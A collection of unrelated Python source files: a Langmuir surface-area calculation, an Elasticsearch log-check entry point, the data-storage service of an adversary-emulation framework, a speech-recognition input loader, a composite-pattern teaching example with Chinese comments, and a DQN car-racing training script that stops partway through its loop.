(except chemisorption) don't follow this behaviour, it is important to regard
the Langmuir surface area as an estimate.
References
----------
.. [#] <NAME>, <NAME>. Soc., 38, 2219 (1916); 40, 1368 (1918)
See Also
--------
pygaps.characterisation.area_lang.area_langmuir_raw : low level method
"""
# get adsorbate properties
adsorbate = Adsorbate.find(isotherm.adsorbate)
cross_section = adsorbate.get_prop("cross_sectional_area")
# Read data in
loading = isotherm.loading(
branch=branch,
loading_unit='mol',
loading_basis='molar',
)
try:
pressure = isotherm.pressure(
branch=branch,
pressure_mode='relative',
)
except pgError as err:
raise CalculationError(
"The isotherm cannot be converted to a relative basis. "
"Is your isotherm supercritical?"
) from err
# If on an desorption branch, data will be reversed
if branch == 'des':
loading = loading[::-1]
pressure = pressure[::-1]
# use the langmuir function
(
langmuir_area,
langmuir_const,
n_monolayer,
slope,
intercept,
minimum,
maximum,
corr_coef,
) = area_langmuir_raw(
pressure,
loading,
cross_section,
p_limits,
)
if verbose:
logger.info(
textwrap.dedent(
f"""\
Langmuir area: a = {langmuir_area:.4g} m2/{isotherm.material_unit}
Minimum pressure point is {pressure[minimum]:.3g} and maximum is {pressure[maximum]:.3g}
The Langmuir constant is: K = {langmuir_const:.3g}
Amount Langmuir monolayer is: n = {n_monolayer:.3g} mol/{isotherm.material_unit}
The slope of the Langmuir fit: s = {slope:.3g}
The intercept of the Langmuir fit: i = {intercept:.3g}
"""
)
)
# Generate plot of the langmuir points chosen
from pygaps.graphing.calc_graphs import langmuir_plot
langmuir_plot(
pressure,
langmuir_transform(pressure, loading),
minimum,
maximum,
slope,
intercept,
)
return {
'area': langmuir_area,
'langmuir_const': langmuir_const,
'n_monolayer': n_monolayer,
'langmuir_slope': slope,
'langmuir_intercept': intercept,
'corr_coef': corr_coef,
'p_limit_indices': (minimum, maximum),
}
def area_langmuir_raw(
pressure: "list[float]",
loading: "list[float]",
cross_section: float,
p_limits: "tuple[float,float]" = None,
):
"""
Calculate Langmuir-determined surface area.
This is a 'bare-bones' function to calculate Langmuir surface area which is
designed as a low-level alternative to the main function.
Designed for advanced use, its parameters have to be manually specified.
Parameters
----------
pressure : list[float]
Pressures, relative.
loading : list[float]
Loadings, in mol/basis.
cross_section : float
Adsorbed cross-section of the molecule of the adsorbate, in nm.
p_limits : tuple[float, float], optional
Pressure range in which to perform the calculation.
Returns
-------
langmuir_area : float
Calculated Langmuir surface area.
langmuir_const : float
K constant from the Langmuir equation.
n_monolayer : float
Adsorbed quantity in the monolayer.
slope : float
Calculated slope of the Langmuir plot.
intercept : float
Calculated intercept of the Langmuir plot.
minimum : float
Minimum point taken for the linear region.
maximum : float
Maximum point taken for the linear region.
corr_coef : float
Correlation coefficient of the straight line in the Langmuir plot.
"""
# Check lengths
if len(pressure) == 0:
raise ParameterError("Empty input values!")
if len(pressure) != len(loading):
raise ParameterError("The length of the pressure and loading arrays do not match.")
# Ensure numpy arrays, if not already
loading = numpy.asarray(loading)
pressure = numpy.asarray(pressure)
# select the maximum and minimum of the points and the pressure associated
minimum = 0
maximum = len(pressure) - 1 # As we want absolute position
if p_limits is None:
# Give reasonable automatic limits
# Min pressure is taken as 5% of max
# Max pressure is taken as 90% of max
p_limits = [
pressure[maximum] * 0.05,
pressure[maximum] * 0.9,
]
# Determine the limits
if p_limits[0]:
minimum = numpy.searchsorted(pressure, p_limits[0])
if p_limits[1]:
maximum = numpy.searchsorted(pressure, p_limits[1]) - 1
if maximum - minimum < 2: # (for 2 point minimum)
raise CalculationError(
"The isotherm does not have enough points (at least 2) "
"in selected region. Unable to calculate Langmuir area."
)
pressure = pressure[minimum:maximum + 1]
loading = loading[minimum:maximum + 1]
# calculate the Langmuir slope and intercept
langmuir_array = langmuir_transform(
pressure,
loading,
)
slope, intercept, corr_coef = langmuir_fit(
pressure,
langmuir_array,
)
# calculate the Langmuir parameters
n_monolayer, langmuir_const, langmuir_area = langmuir_parameters(
slope,
intercept,
cross_section,
)
# Checks for consistency
if langmuir_const < 0:
logger.warning("The Langmuir constant is negative.")
if corr_coef < 0.99:
logger.warning("The correlation is not linear.")
return (
langmuir_area,
langmuir_const,
n_monolayer,
slope,
intercept,
minimum,
maximum,
corr_coef,
)
def langmuir_transform(pressure, loading):
"""Langmuir transform function."""
return pressure / loading
def langmuir_fit(pressure, langmuir_points):
"""Find the slope and intercept of the Langmuir region."""
slope, intercept, corr_coef, p, stderr = stats.linregress(pressure, langmuir_points)
return slope, intercept, corr_coef
def langmuir_parameters(slope, intercept, cross_section):
"""Calculate the Langmuir parameters from slope and intercept."""
n_monolayer = 1 / slope
langmuir_const = 1 / (intercept * n_monolayer)
langmuir_area = n_monolayer * cross_section * (10**(-18)) * constants.Avogadro
return n_monolayer, langmuir_const, langmuir_area
def simple_lang(pressure, n_total, k_const):
"""A simple Langmuir equation returning loading at a pressure."""
return (n_total * k_const * pressure / (1 + k_const * pressure))
|
"""
Entry point for the program.
"""
from __future__ import print_function
from es_insanity_checker import ESInsanityChecker
from es_logs_reloader import ESLogsReloader
from es_duplicates_handler import ESDuplicatesHandler
from es_logger import ESLogger
from traceback import print_exc
from optparse import OptionParser
from yaml import load, dump
from tqdm import tqdm
import time
try:
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
from yaml import Loader, Dumper
def get_option_parser():
"""
Initiates the argument parser.
:return: OptionParser object
"""
parser = OptionParser()
parser.add_option("-c", "--config_file", action="store", type="string", dest="config_file",
help="A yaml configuration file, configures program's behavior.")
return parser
def main():
# Parse arguments
parser = get_option_parser()
(options, args) = parser.parse_args()
# Read configuration from yaml file
with open(options.config_file, "r") as file_obj:
data = load(file_obj)
# Don't generate test output in duplicate handler unless the
# option is enabled in the config file
generate_test_output = False
try:
# Create logger for main module
logger_options = data["logger"]
logger_path = logger_options["logger_path"]
# Create new ESLogger
if logger_path:
log_instance = ESLogger(name=__name__, filename=logger_path)
else:
log_instance = ESLogger(name=__name__)
es_logger = log_instance.get_es_logger()
# Initiates ESInsanityChecker object with args from yaml file
ic_options = data["insanity_checker"]
insanity_checker = ESInsanityChecker(es_host=ic_options["es_host"],
es_port=ic_options["es_port"],
output_dir=ic_options["output_dir"],
logs_dir=ic_options["logs_dir"],
output_format=ic_options["output_format"],
logger_path=logger_path)
# Initiates ESLogsReloader object with args from yaml file
r_options = data["reloader"]
reloader = ESInsanityChecker(ls_host=r_options["ls_host"],
ls_port=r_options["ls_port"],
input_format=r_options["input_format"],
input_dir=r_options["input_dir"],
logger_path=logger_path)
# Initiates ESDuplicateHandler object with args from yaml file
dh_options = data["duplicate_handler"]
duplicate_handler = ESDuplicatesHandler(es_host=dh_options["es_host"],
es_port=dh_options["es_port"],
test_output_dir=dh_options["test_output_dir"],
hash_keys=dh_options["hash_keys"],
reserved_index_names=dh_options["reserved_index_names"],
logger_path=logger_path)
generate_test_output = dh_options["generate_test_output"]
except KeyError as e:
print_exc()
raise KeyError("Illegal configuration, read configuration guide from pointers.")
except ValueError as e:
print_exc()
raise ValueError("Illegal configuration, read configuration guide from pointers.")
# Run general tests
print("Running insanity checks...")
es_logger.info("Running insanity checks...")
insanity_checker.run_tests()
print("Finished Insanity checks...")
es_logger.info("Finished Insanity checks...")
# Reloads missing logs to elasticsearch through logstash
print("Reloading missing logs...")
es_logger.info("Reloading missing logs...")
reloader.reaload_logs()
print("Waiting for reloader to finish loading docs...")
es_logger.info("Waiting for reloader to finish loading docs...")
for i in tqdm(range(10)):
time.sleep(1) # Change to 30 later
print("Finished reloading logs...")
es_logger.info("Finished reloading logs...")
# Locate and delete duplicate documents in elasticsearch cluster
print("Deduplicating docs...")
es_logger.info("Deduplicating docs...")
# TODO do this with multi processes
if generate_test_output:
duplicate_handler.deduplicate_docs_and_test_results()
else:
duplicate_handler.deduplicate_docs()
print("Waiting for ESDuplicatesHandler to delete duplicates")
es_logger.info("Waiting for ESDuplicatesHandler to delete duplicates")
for i in tqdm(range(5)):
time.sleep(1)
print("Finished deduplicating docs...")
es_logger.info("Finished deduplicating docs...")
print("Finished validator tasks successfully...")
es_logger.debug("Finished validator tasks successfully...")
if __name__ == '__main__':
main()
|
import glob
import json
from base64 import b64encode
from collections import defaultdict
from app.objects.c_planner import Planner
from app.service.base_service import BaseService
from app.utility.rule import RuleAction
class DataService(BaseService):
def __init__(self, dao):
self.dao = dao
self.log = self.add_service('data_svc', self)
self.ram = dict(agents=[], planners=[])
async def apply(self, collection):
"""
Add a new collection to RAM
:param collection:
:return:
"""
self.ram[collection] = []
async def load_data(self, directory=None, schema='conf/core.sql'):
"""
Read all the data sources to populate the SQL database
:param directory:
:param schema:
:return: None
"""
with open(schema) as schema:
await self.dao.build(schema.read())
if directory:
self.log.debug('Loading data from %s' % directory)
await self._load_abilities(directory='%s/abilities' % directory)
await self._load_adversaries(directory='%s/adversaries' % directory)
await self._load_facts(directory='%s/facts' % directory)
await self._load_planners(directory='%s/planners' % directory)
async def save(self, object_name, object_dict):
"""
Save a dict() for any object
:param object_name:
:param object_dict:
:return:
"""
try:
if object_name == 'operation':
return await self._create_operation(**object_dict)
elif object_name == 'link':
return await self._create_link(object_dict)
elif object_name == 'adversary':
return await self._create_adversary(**object_dict)
elif object_name == 'ability':
return await self._create_ability(**object_dict)
elif object_name == 'relationship':
return await self.dao.create('core_relationship', object_dict)
elif object_name == 'fact':
return await self.dao.create('core_fact', object_dict)
elif object_name == 'result':
return await self.dao.create('core_result', object_dict)
self.log.warning('[!] SAVE on non-core type: %s' % object_name)
return await self.dao.create(object_name, object_dict)
except Exception as e:
self.log.error('[!] SAVE %s: %s' % (object_name, e))
async def delete(self, object_name, criteria):
"""
Delete any object in the database by table name and ID
:param object_name: the name of the table
:param criteria: a dict of key/value pairs to match on
"""
self.log.debug('Deleting %s from %s' % (criteria, object_name))
await self.dao.delete('core_%s' % object_name, data=criteria)
async def update(self, object_name, key, value, data):
"""
Update any field in any table in the database
:param object_name:
:param key:
:param value:
:param data:
:return: None
"""
await self.dao.update('core_%s' % object_name, key, value, data)
async def get(self, object_name, criteria=None):
"""
Get the contents of any object
:param object_name:
:param criteria:
:return: a list of dictionary results
"""
try:
if object_name == 'operation':
return await self.dao.get('core_operation', criteria)
elif object_name == 'chain':
return await self.dao.get('core_chain', criteria)
elif object_name == 'ability':
return await self.dao.get('core_ability', criteria)
elif object_name == 'payload':
return await self.dao.get('core_payload', criteria)
elif object_name == 'used':
return await self.dao.get('core_used', criteria)
elif object_name == 'fact':
return await self.dao.get('core_fact', criteria)
self.log.warning('[!] GET on non-core type: %s' % object_name)
return await self.dao.get(object_name, criteria)
except Exception as e:
self.log.error('[!] GET %s: %s' % (object_name, e))
async def explode(self, object_name, criteria=None):
"""
Get an exploded version of any object
:param object_name:
:param criteria:
:return:
"""
try:
if object_name == 'operation':
return await self._explode_operation(criteria)
elif object_name == 'chain':
return await self._explode_chain(criteria)
elif object_name == 'adversary':
return await self._explode_adversaries(criteria)
elif object_name == 'ability':
return await self._explode_abilities(criteria)
elif object_name == 'parser':
return await self._explode_parser(criteria)
elif object_name == 'source':
return await self._explode_sources(criteria)
elif object_name == 'result':
return await self._explode_results(criteria)
elif object_name == 'used':
return await self._explode_used(criteria)
self.log.error('[!] EXPLODE on unknown type: %s' % object_name)
except Exception as e:
self.log.error('[!] EXPLODE %s: %s' % (object_name, e))
async def store(self, c_object):
"""
Accept any c_object type and store it (create/update) in RAM
:param c_object:
:return: a single c_object
"""
try:
return c_object.store(self.ram)
except Exception as e:
self.log.error('[!] STORE: %s' % e)
async def locate(self, object_name, match=None):
"""
Find all c_objects which match a search. Return all c_objects if no match.
:param object_name:
:param match: dict()
:return: a list of c_object types
"""
try:
return [obj for obj in self.ram[object_name] if obj.match(match)]
except Exception as e:
self.log.error('[!] LOCATE: %s' % e)
async def remove(self, object_name, match):
"""
Remove any c_objects which match a search
:param object_name:
:param match: dict()
:return:
"""
try:
self.ram[object_name][:] = [obj for obj in self.ram[object_name] if not obj.match(match)]
except Exception as e:
self.log.error('[!] REMOVE: %s' % e)
""" PRIVATE """
async def _explode_abilities(self, criteria=None):
abilities = await self.dao.get('core_ability', criteria=criteria)
for ab in abilities:
ab['cleanup'] = '' if ab['cleanup'] is None else ab['cleanup']
ab['parsers'] = await self.dao.get('core_parser', dict(ability=ab['id']))
ab['payload'] = await self.dao.get('core_payload', dict(ability=ab['id']))
ab['requirements'] = await self.dao.get('core_requirement', dict(ability=ab['id']))
for r in ab['requirements']:
r['enforcements'] = (await self.dao.get('core_requirement_map', dict(requirement_id=r['id'])))[0]
return abilities
async def _explode_adversaries(self, criteria=None):
adversaries = await self.dao.get('core_adversary', criteria)
for adv in adversaries:
phases = defaultdict(list)
for t in await self.dao.get('core_adversary_map', dict(adversary_id=adv['adversary_id'])):
for ability in await self._explode_abilities(dict(ability_id=t['ability_id'])):
ability['adversary_map_id'] = t['id']
phases[t['phase']].append(ability)
adv['phases'] = dict(phases)
return adversaries
async def _explode_operation(self, criteria=None):
operations = await self.dao.get('core_operation', criteria)
for op in operations:
op['chain'] = sorted(await self._explode_chain(criteria=dict(op_id=op['id'])), key=lambda k: k['id'])
adversaries = await self._explode_adversaries(dict(id=op['adversary_id']))
op['adversary'] = adversaries[0]
op['host_group'] = await self.locate('agents', match=dict(group=op['host_group']))
sources = await self.dao.get('core_source_map', dict(op_id=op['id']))
source_list = [s['source_id'] for s in sources]
op['facts'] = await self.dao.get_in('core_fact', 'source_id', source_list)
for fact in op['facts']:
fact['relationships'] = await self._add_fact_relationships(dict(source=fact['id']))
op['rules'] = await self._sort_rules_by_fact(await self.dao.get_in('core_rule', 'source_id', source_list))
return operations
async def _explode_results(self, criteria=None):
results = await self.dao.get('core_result', criteria=criteria)
for r in results:
link = await self.dao.get('core_chain', dict(id=r['link_id']))
link[0]['facts'] = await self.dao.get('core_fact', dict(link_id=link[0]['id']))
r['link'] = link[0]
return results
async def _explode_chain(self, criteria=None):
chain = []
for link in await self.dao.get('core_chain', criteria=criteria):
a = await self.dao.get('core_ability', criteria=dict(id=link['ability']))
chain.append(dict(abilityName=a[0]['name'], abilityDescription=a[0]['description'], **link))
return chain
async def _explode_sources(self, criteria=None):
sources = await self.dao.get('core_source', criteria=criteria)
for s in sources:
s['facts'] = await self.dao.get('core_fact', dict(source_id=s['id']))
return sources
async def _explode_parser(self, criteria=None):
parsers = await self.dao.get('core_parser', criteria)
for parser in parsers:
parser['mappers'] = await self.dao.get('core_parser_map', dict(parser_id=parser['id']))
return parsers
async def _explode_used(self, criteria=None):
used_facts = await self.dao.get('core_used', criteria=criteria)
for uf in used_facts:
fact = (await self.dao.get('core_fact', dict(id=uf['fact_id'])))[0]
uf['property'] = fact['property']
uf['value'] = fact['value']
return used_facts
async def _create_link(self, link):
used = link.pop('used', [])
link_id = await self.dao.create('core_chain', link)
for uf in used:
await self.dao.create('core_used', dict(link_id=link_id, fact_id=uf))
async def _create_adversary(self, i, name, description, phases):
identifier = await self.dao.create('core_adversary',
dict(adversary_id=i, name=name, description=description))
await self.dao.delete('core_adversary_map', data=dict(adversary_id=i))
for ability in phases:
a = dict(adversary_id=i, phase=ability['phase'], ability_id=ability['id'])
await self.dao.create('core_adversary_map', a)
return identifier
async def _write_ability(self, filename):
for entries in self.strip_yml(filename):
for ab in entries:
for pl, executors in ab['platforms'].items():
for name, info in executors.items():
for e in name.split(','):
encoded_test = b64encode(info['command'].strip().encode('utf-8'))
await self._create_ability(ability_id=ab.get('id'), tactic=ab['tactic'].lower(),
technique_name=ab['technique']['name'],
technique_id=ab['technique']['attack_id'],
test=encoded_test.decode(),
description=ab.get('description') or '',
executor=e, name=ab['name'], platform=pl,
cleanup=b64encode(
info['cleanup'].strip().encode(
'utf-8')).decode() if info.get(
'cleanup') else None,
payload=info.get('payload'), parsers=info.get('parsers', []),
requirements=ab.get('requirements', []))
await self._delete_stale_abilities(ab)
async def _load_abilities(self, directory):
for filename in glob.iglob('%s/**/*.yml' % directory, recursive=True):
await self._write_ability(filename)
async def _load_adversaries(self, directory):
for filename in glob.iglob('%s/*.yml' % directory, recursive=True):
for adv in self.strip_yml(filename):
phases = [dict(phase=k, id=i) for k, v in adv.get('phases', dict()).items() for i in v]
for pack in [await self._add_adversary_packs(p) for p in adv.get('packs', [])]:
phases += pack
if adv.get('visible', True):
await self._create_adversary(adv['id'], adv['name'], adv['description'], phases)
async def _load_facts(self, directory):
for filename in glob.iglob('%s/*.yml' % directory, recursive=False):
for source in self.strip_yml(filename):
source_id = await self.dao.create('core_source', dict(name=source['name']))
for fact in source.get('facts', []):
fact['source_id'] = source_id
fact['score'] = fact.get('score', 1)
await self.save('fact', fact)
for rule in source.get('rules', []):
rule['source_id'] = source_id
await self._create_rule(**rule)
async def _load_planners(self, directory):
for filename in glob.iglob('%s/*.yml' % directory, recursive=False):
for planner in self.strip_yml(filename):
await self.store(
Planner(name=planner.get('name'), module=planner.get('module'),
params=json.dumps(planner.get('params')))
)
self.log.debug('Loaded %s planners' % len(self.ram['planners']))
async def _create_rule(self, fact, source_id, action='DENY', match='.*'):
try:
action = RuleAction[action.upper()].value
await self.dao.create('core_rule', dict(fact=fact, source_id=source_id, action=action, match=match))
except KeyError:
self.log.error(
'Rule action must be in [%s] not %s' % (', '.join(RuleAction.__members__.keys()), action.upper()))
async def _create_ability(self, ability_id, tactic, technique_name, technique_id, name, test, description, executor,
platform, cleanup=None, payload=None, parsers=None, requirements=None):
ability = dict(ability_id=ability_id, name=name, test=test, tactic=tactic,
technique_id=technique_id, technique_name=technique_name,
executor=executor, platform=platform, description=description,
cleanup=cleanup)
# update
unique_criteria = dict(ability_id=ability_id, platform=platform, executor=executor)
for entry in await self.dao.get('core_ability', unique_criteria):
await self.update('core_ability', 'id', entry['id'], ability)
for parser in await self.dao.get('core_parser', dict(ability=entry['id'])):
await self.dao.delete('core_parser_map', dict(parser_id=parser['id']))
for requirement in await self.dao.get('core_requirement', dict(ability=entry['id'])):
await self.dao.delete('core_requirement_map', dict(requirement_id=requirement['id']))
await self.dao.delete('core_parser', dict(ability=entry['id']))
await self.dao.delete('core_payload', dict(ability=entry['id']))
return await self._save_ability_extras(entry['id'], payload, parsers, requirements)
# new
identifier = await self.dao.create('core_ability', ability)
return await self._save_ability_extras(identifier, payload, parsers, requirements)
@staticmethod
async def _sort_rules_by_fact(rules):
organized_rules = defaultdict(list)
for rule in rules:
fact = rule.pop('fact')
organized_rules[fact].append(rule)
return organized_rules
async def _save_ability_extras(self, identifier, payload, parsers, requirements):
if payload:
await self.dao.create('core_payload', dict(ability=identifier, payload=payload))
await self._save_ability_relationships(identifier, table='core_parser', id_type='parser_id',
relationships=parsers)
await self._save_ability_relationships(identifier, table='core_requirement', id_type='requirement_id',
relationships=requirements)
return identifier
async def _save_ability_relationships(self, identifier, table, id_type, relationships):
for module in relationships:
_id = await self.dao.create(table, dict(ability=identifier, module=module))
for r in relationships.get(module):
relationship = {id_type: _id, 'source': r.get('source'), 'edge': r.get('edge'),
'target': r.get('target')}
await self.dao.create('%s_map' % table, relationship)
async def _delete_stale_abilities(self, ability):
for saved in await self.dao.get('core_ability', dict(ability_id=ability.get('id'))):
for platform, executors in ability['platforms'].items():
if platform == saved['platform'] and not saved['executor'] in str(executors.keys()):
await self.dao.delete('core_ability', dict(id=saved['id']))
if saved['platform'] not in ability['platforms']:
await self.dao.delete('core_ability', dict(id=saved['id']))
async def _add_adversary_packs(self, pack):
_, filename = await self.get_service('file_svc').find_file_path('%s.yml' % pack, location='data')
for adv in self.strip_yml(filename):
return [dict(phase=k, id=i) for k, v in adv.get('phases').items() for i in v]
async def _add_fact_relationships(self, criteria=None):
relationships = await self.dao.get('core_relationship', criteria)
return [dict(edge=r.get('edge'), target=(await self.dao.get('core_fact', dict(id=r.get('target'))))[0])
for r in relationships if r.get('target')]
async def _create_operation(self, name, group, adversary_id, jitter='2/8', sources=[],
planner=None, state=None, allow_untrusted=False, autonomous=True):
op_id = await self.dao.create('core_operation', dict(
name=name, host_group=group, adversary_id=adversary_id, finish=None, phase=0, jitter=jitter,
start=self.get_current_timestamp(), planner=planner, state=state,
allow_untrusted=allow_untrusted, autonomous=autonomous))
source_id = await self.dao.create('core_source', dict(name=name))
await self.dao.create('core_source_map', dict(op_id=op_id, source_id=source_id))
for s_id in [s for s in sources if s]:
await self.dao.create('core_source_map', dict(op_id=op_id, source_id=s_id))
return op_id
|
import os
import random
from struct import unpack
from subprocess import call, PIPE
import numpy as np
import tensorflow as tf
from utils import utils
from pathlib import Path
class BaseInputData():
def __init__(self,
hparams,
mode,
batch_size,
dev=False):
self.hparams = hparams
self.mode = mode
self.vocab = self.load_vocab(hparams.vocab_file)
self.vocab_size = len(self.vocab)
if hparams.norm_mean_path is not None:
mean = open(hparams.norm_mean_path).read().split('\n')[:-1]
self.mean = np.array([float(x) for x in mean])
var = open(hparams.norm_var_path).read().split('\n')[:-1]
self.var = np.array([float(x) for x in var])
else:
self.mean = self.var = None
hparams.vocab_size = self.vocab_size
self.batch_size = tf.cast(batch_size, tf.int64)
if self.mode == tf.estimator.ModeKeys.TRAIN:
self.data_filename = hparams.train_data
elif self.mode == tf.estimator.ModeKeys.EVAL:
self.data_filename = hparams.test_data if not dev else hparams.dev_data
elif self.mode == tf.estimator.ModeKeys.PREDICT:
self.data_filename = hparams.input_path
self.filenames = tf.placeholder(dtype=tf.string)
self.targets = tf.placeholder(dtype=tf.string)
inputs = []
with open(Path(self.data_filename), "r", encoding=self.hparams.encoding) as f:
headers = f.readline().split('\t')
for line in f.read().split('\n'):
if self.mode != tf.estimator.ModeKeys.PREDICT:
if line.strip() == "": continue
input = {headers[i]: dat for i, dat in enumerate(line.strip().split('\t'))}
if hparams.get('use_sos_eos', False) and 'target' in input:
input['target'] = "%d %s %d" % (
self.hparams.sos_index, input['target'],
self.hparams.eos_index)
inputs.append(input)
self.size = len(inputs)
self.inputs = inputs
def load_vocab(self, vocab_file):
labels = []
count = 0
for s in open(Path(vocab_file), encoding=self.hparams.encoding).read().split('\n'):
if ' ' in s: # word id
labels.append(s.strip().split(' ', 1))
else: # word
labels.append((s, str(count)))
count += 1
vocab = {int(id): label for label, id in labels}
return vocab
if True or self.hparams.get('use_sos_eos', False):
#self.hparams.eos_index = 0
#self.hparams.sos_index = 1
#vocab[0] = '<eos>'
#vocab[1] = '<sos>'
self.hparams.eos_index = len(labels)
self.hparams.sos_index = len(labels) + 1
vocab[len(labels)] = '<eos>'
vocab[len(labels) + 1] = '<sos>'
elif self.hparams.get('eos_index', None) is None:
self.hparams.eos_index = len(labels)
vocab[len(labels)] = '<eos>'
return vocab
def get_batched_dataset(self, dataset):
return utils.get_batched_dataset(
dataset,
self.batch_size,
self.hparams.num_features,
# self.hparams.num_buckets,
self.mode,
padding_values=self.hparams.get("eos_index", len(self.vocab) - 1)
)
def load_wav(self, filename):
outfile = "tmp.htk"
call([
self.hparams.hcopy_path,
"-C", self.hparams.hcopy_config, "-T", "1",
filename.decode('ascii'), outfile
], stdout=PIPE)
fh = open(outfile, "rb")
spam = fh.read(12)
# print("spam", spam)
nSamples, sampPeriod, sampSize, parmKind = unpack(">IIHH", spam)
veclen = int(sampSize / 4)
fh.seek(12, 0)
dat = np.fromfile(fh, dtype=np.float32)
dat = dat.reshape(len(dat) // veclen, veclen)
dat = dat.byteswap()
fh.close()
if self.mean is None:
dat = (dat - dat.mean()) / np.std(dat)
else:
dat = (dat - self.mean) / np.sqrt(self.var)
return np.float32(dat)
def load_htk(self, filename):
fh = open(filename, "rb")
spam = fh.read(12)
nSamples, sampPeriod, sampSize, parmKind = unpack(">IIHH", spam)
veclen = int(sampSize / 4)
fh.seek(12, 0)
dat = np.fromfile(fh, dtype=np.float32)
if len(dat) % veclen != 0: dat = dat[:len(dat) - len(dat) % veclen]
dat = dat.reshape(len(dat) // veclen, veclen)
dat = dat.byteswap()
fh.close()
return dat
def load_npy(self, filename):
# return np.array([[0.0]], dtype=np.float32)
if os.path.exists(filename.decode('utf-8')):
return np.load(filename.decode('utf-8')).astype(np.float32)
else:
return np.array([[0.0]], dtype=np.float32)
def load_input(self, filepath):
print(filepath)
ext = os.path.splitext(filepath)[1]
if ext == b".htk":
return self.load_htk(filepath)
elif ext == b".wav":
return self.load_wav(filepath)
elif ext == b".npy":
return self.load_npy(filepath)
elif ext in {b'.webm'}:
import ffmpeg
stream = ffmpeg.input(filepath)
output_path = os.path.join('tmp', 'output.wav')
stream = ffmpeg.output(stream, output_path)
ffmpeg.run(stream)
dat = self.load_wav(output_path)
os.remove(output_path)
return dat
else:
return np.array([[0.0] * 120] * 8).astype(np.float32)
def extract_target_features(self, str):
return [[int(x) for x in str.decode('utf-8').split(' ')]]
def get_word(self, id):
return self.vocab[id]
def decode(self, d, id):
"""Decode from label ids to words"""
ret = []
for c in d:
if c < 0: continue
if self.vocab[c] == '<eos>': return ret # sos
if self.vocab[c] == '<sos>': continue
val = self.get_word(c)
if val != '':
ret.append(val if c in self.vocab else '?')
return ret
def shuffle(self, inputs, bucket_size=None):
if bucket_size:
shuffled_inputs = []
for i in range(0, len(inputs) // bucket_size):
start, end = i * bucket_size, min((i + 1) * bucket_size, len(inputs))
ls = inputs[start:end]
random.shuffle(ls)
shuffled_inputs += ls
return shuffled_inputs
else:
ls = list(inputs)
random.shuffle(ls)
return ls
def get_inputs_list(self, inputs, field):
return [inp[field] for inp in self.inputs]
|
<reponame>zhguokai/PythonStudy
# -*- coding: utf-8 -*-
"""
公司层级间的组合模式应用
Created by 相濡HH on 3/19/15.
"""
class Company(object):
"""
公司接口
"""
def __init__(self, name):
"""
初始化方法
:param name:
:return:
"""
self._name = name
def add(self, company):
"""
增加公司接口
:param company:
:return:
"""
def remvoe(self, company):
"""
删除公司接口
:param company:
:return:
"""
def display(self, depth):
"""
显示层级关系
:param depth:
:return:
"""
def run_resp(self):
"""
履行职责接口
:return:
"""
class ConcreteCompany(Company):
"""
公司具体实现类
"""
def __init__(self, name):
"""
初始化方法
:param name:
:return:
"""
Company.__init__(self, name)
self.compay_list = []
def add(self, company):
"""
增加公司接口
:param company:
:return:
"""
self.compay_list.append(company)
def remvoe(self, company):
"""
删除公司接口
:param company:
:return:
"""
self.compay_list.remove(company)
def display(self, depth):
"""
显示层级关系
:param depth:
:return:
"""
print("-" * depth + self._name)
for com in self.compay_list:
com.display(depth + 2)
def run_resp(self):
"""
履行职责接口
:return:
"""
print("执行任务")
for com in self.compay_list:
com.run_resp()
class HRCompany(Company):
"""
人力资源子类
"""
def __init__(self, name):
"""
初始化方法
:param name:
:return:
"""
Company.__init__(self, name)
def add(self, company):
"""
增加公司接口
:param company:
:return:
"""
def remvoe(self, company):
"""
删除公司接口
:param company:
:return:
"""
def display(self, depth):
"""
显示层级关系
:param depth:
:return:
"""
print("-" * depth + self._name)
def run_resp(self):
"""
履行职责接口
:return:
"""
print("%s: 员工招聘培训管理" % self._name)
class FianceCompany(Company):
"""
财务子类
"""
def __init__(self, name):
"""
初始化方法
:param name:
:return:
"""
Company.__init__(self, name)
def add(self, company):
"""
增加公司接口
:param company:
:return:
"""
def remvoe(self, company):
"""
删除公司接口
:param company:
:return:
"""
def display(self, depth):
"""
显示层级关系
:param depth:
:return:
"""
print("-" * depth + self._name)
def run_resp(self):
"""
履行职责接口
:return:
"""
print("%s: 公司财务结算" % self._name)
class Client(object):
"""
客户端
"""
def test(self):
root = ConcreteCompany("北京总公司")
root.add(HRCompany("总公司人力资源部"))
root.add(FianceCompany("总公司财务部"))
comp_a = ConcreteCompany("华东分公司")
comp_a.add(HRCompany("华东公司人力资源部"))
comp_a.add(FianceCompany("华东公司财务部"))
root.add(comp_a)
comp_a = ConcreteCompany("南京分公司")
comp_a.add(HRCompany("南京公司人力资源部"))
comp_a.add(FianceCompany("南京公司财务部"))
root.add(comp_a)
root.display(1)
root.run_resp()
if __name__ == '__main__':
cls = Client()
cls.test()
|
<reponame>ParsaVahidi/Deep-Reinforcent-Learning-for-openAI-car-racing-game
# This code is originated from https://github.com/andywu0913/OpenAI-GYM-CarRacing-DQN
import os
import sys
import argparse
import gym
import DQNAgent
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from datetime import datetime
from collections import deque
from DQNAgent import CarRacingDQNAgent
RENDER = True
STARTING_EPISODE = 1
ENDING_EPISODE = 501 # 1000
SKIP_FRAMES = 2
TRAINING_BATCH_SIZE = 64
SAVE_TRAINING_FREQUENCY = 50
UPDATE_TARGET_MODEL_FREQUENCY = 5
if __name__ == '__main__':
main_path = sys.path[0]
date_now = datetime.now()
date_str = date_now.strftime("%d_%m_%H_%M")
save_folder = os.path.join(main_path, 'save', date_str)
parser = argparse.ArgumentParser(description='Training a DQN agent to play CarRacing.')
parser.add_argument('-m', '--model', help='Specify the last trained model path if you want to continue training after it.')
parser.add_argument('-p', '--epsilon', type=float, default=1.0, help='The starting epsilon of the agent, default to 1.0.')
args = parser.parse_args()
env = gym.make('CarRacing-v0') # original environment
agent = CarRacingDQNAgent(epsilon=args.epsilon)
if args.model:
agent.load(args.model)
total_reward_list = []
real_reward_list = []
for e in range(STARTING_EPISODE, ENDING_EPISODE+1):
print('Episode #{}'.format(e))
init_state = env.reset()
init_state = agent.process_state_image(init_state)
total_reward = 0
real_reward = 0
negative_reward_counter = 0
state_frame_stack_queue = deque([init_state]*agent.frame_stack_num, maxlen=agent.frame_stack_num)
time_frame_counter = 1
done = False
while True:
if RENDER:
env.render()
current_state_frame_stack = agent.generate_state_from_queue(state_frame_stack_queue)
action = agent.act(current_state_frame_stack)
# print('Action to apply: {}'.format(action))
reward = 0
for _ in range(SKIP_FRAMES+1):
next_state, r, done, info = env.step(action)
reward += r
real_reward += r
if done:
break
# If continually getting negative reward 10 times after the tolerance steps, terminate this episode
